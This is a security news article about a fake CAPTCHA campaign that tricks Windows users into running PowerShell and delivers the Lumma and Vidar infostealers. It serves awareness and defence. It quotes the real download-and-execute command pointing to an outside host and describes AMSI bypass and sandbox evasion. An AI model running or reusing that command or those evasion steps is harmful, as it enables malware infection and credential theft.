A sophisticated malware campaign is targeting Windows users through deceptive CAPTCHA verification prompts that trick victims into executing malicious PowerShell scripts.
This resurgence of fake CAPTCHA attacks, identified in early February 2025, represents a growing threat as attackers continue to employ social engineering tactics to bypass security measures and compromise systems.
The attack begins when users encounter what appears to be a standard CAPTCHA verification on compromised or malicious websites.
However, instead of simply proving they are human, users are prompted to execute a PowerShell command that initiates a multi-stage infection process.
This command is disguised as part of the verification process, making it seem legitimate to unsuspecting users.
Researchers at Trustwave SpiderLabs noted this campaign during an Advanced Continual Threat Hunt (ACTH) investigation.
This attack chain ultimately delivers dangerous infostealers such as Lumma and Vidar, which are designed to steal sensitive information from compromised systems and maintain persistence.
When users execute the deceptive command, it launches a series of complex, encrypted PowerShell scripts.
.webp)
The initial command appears as: powershell -NoProfile -Command "mshta https://pomppie.shop/RUKE.mp4 # 'I am not a robot - rëCAPTCHA Verification ID: 2188".
This seemingly innocent verification step actually downloads and executes an HTA file disguised with an MP4 extension.
The HTA file then triggers additional PowerShell scripts through a sophisticated multi-stage decryption process.
.webp)
The malware employs a simple subtraction cipher where encrypted numerical values are reduced by 634 to reveal the original characters.
This decryption mechanism leads to further stages of PowerShell execution.
Advanced Evasion Techniques
The malware employs several advanced techniques to evade detection. Researchers discovered that the attack uses XOR encryption with the key “AMSI_RESULT_NOT_DETECTED” to bypass security tools.
Moreover, the retrieved PowerShell scripts are intentionally large in file size, an apparent attempt to evade sandbox or emulation-based detection mechanisms that impose execution limits.
The final stages of the attack reveal the deployment of Lumma Stealer malware through Base64-encoded payloads.
.webp)
The malware uses system reflection to load malicious assemblies directly into memory.
Further investigation confirmed that beyond data exfiltration, the malware downloads additional components including a Telegram bot-based HijackLoader and a Golang-based backdoor disguised as legitimate software like ‘TiVo Desktop’.
Security experts recommend implementing robust security awareness training and advanced endpoint protection solutions capable of detecting multi-stage PowerShell attacks to protect against these increasingly sophisticated threats.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
